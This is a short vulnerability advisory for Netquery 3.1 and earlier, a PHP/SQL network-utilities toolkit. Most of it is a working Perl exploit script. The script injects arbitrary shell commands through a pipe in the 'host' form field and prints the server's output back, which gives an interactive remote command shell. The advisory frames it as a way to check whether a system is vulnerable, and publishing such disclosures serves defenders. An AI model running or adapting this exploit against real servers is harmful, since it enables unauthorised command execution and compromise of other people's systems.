QUOTE
SUMMARY
" <http://virtech.org/tools/index.html> Netquery - the complete PHP/SQL
open-source toolkit of network information utilities"
A vulnerability discovered in Netquery allows remote attackers to cause
the program to execute arbitrary code, the following exploit code can be
used to determine whether your system is vulnerable or not.
DETAILS
Vulnerable Systems:
* Netquery versions 3.1 and prior
Exploit:
CODE
#!/usr/bin/perl -w
use strict;
use LWP;
my $browser = new LWP::UserAgent;
$browser->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
if (@ARGV < 1) {
print "\nusage: ./nq.pl http://path/to/form\n\n";
exit(1);
}
my $url = $ARGV[0];
my $command;
while (1) {
print "> ";
while(<STDIN>) {
$command = $_;
chomp($command);
last;
}
&send($command);
}
sub send {
my $ok = 0;
my $output;
my @d;
my $response = $browser->post($url,
[ 'op'
=> 'modload',
'name' =>
'Netquery',
'file'
=> 'pnuser',
'querytype' => 'ping',
'host' =>
'| echo _start_; ' . $command . '; echo _end_;',
'maxp' =>
'4',
]);
die "$url could not be reached" unless $response->is_success;
if ($response->content =~ /<blockquote>_start_(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /_end_/, $output;
print "\n $d[0]\n";
}
elsif ($response->content =~ /_start_(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /_end_/, $output;
print "\n $d[0]\n";
}
elsif ($response->content =~ /<blockquote>(.*)/) {
$output = $1;
$output =~ s/<br \/>/ \n /g;
$output =~ s/<br>/ \n /g;
@d = split /<\/blockquote>/, $output;
print "\n $d[0]\n";
}
else {
print "Not working for some reason\n";
}
}
Link is unavailable
